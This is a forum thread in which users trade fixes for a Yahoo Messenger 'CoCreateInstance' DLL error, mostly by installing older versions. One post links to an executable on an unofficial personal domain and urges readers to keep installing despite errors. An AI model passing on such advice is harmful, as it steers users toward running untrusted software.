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CoCreateInstance for my yahoo DLL failed!!!

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This problem is slowing starting to irrate me, and I am hoping that someone can help me cause the people at yahoo cant. My computer crashed about 6 months ago. Every since I have been having problems with yahoo messenger. I have uninstalled and reinstalled at least 5 times. I have deleted yahoo and reinstalled. I have even downloaded the thing from Microsoft to fix it and that didnt work. Please help me.



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I am wondering if someone can help me. I had yahoo messenger installed on my computer, but someone came along and uninstalled it. Now when I go to download it, it says that CoCreateInstance is not working. I was able to download this months ago...can someone please help me? This is so frustrating!!!



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I originally downloaded Yahoo Messenger about two years. At the time, I was using Windows '98. Earlier this year, I upgraded to Windows XP. Yahoo Messenger continued to work fine. I later uninstalled Yahoo Messenger to clear out some clutter from my computer. When I decided to reinstall just last month, I continued to get the CoCreateInstall MyYahoo DLL message.


Here is how I fixed the problem. The DLL problem was apparently caused by my Windows XP upgrade being incompatible with the newest Yahoo Messenger 6.0, which is the only choice you are given to download now from the Yahoo site. I was able to find a web site allowing me to download a prior Yahoo Messenger version; specifically, 5.6. That was the same version I had originally had and uninstalled. After installing 5.6, my Yahoo Messenger works fine.


Hope this helps, since I am certainly no computer expert.

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I know how to fix it. To fix this error, just uninstall your current version and then go to http://www.carolisayazakuser.com/ymsgr_1358.exe

and download this version. It's an older version that will offer you updates after you install it. Go ahead and get the updates. You will get a few errors while installing but keep installing and it will work. I had the CoCreateInstance error and when I did this, it now works when everything else failed! Please spread the word if this works for you. There are people everywhere having trouble with Yahoo Messenger and now we have a fix!!!

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Thank you so much freaky and bubberland. I've been trying to reinstall yahoo on a laptop and kept getting that stupid error. I put a thread in at techspot.com, but never got an answer until I made a smart remark, and then he suggested trillan, which said in another thread is not compatible with Yahoo Messeger 7. Compounding problems!!!! Your suggestion worked, now all I have to do it get it to update itself.

Thanks a million.


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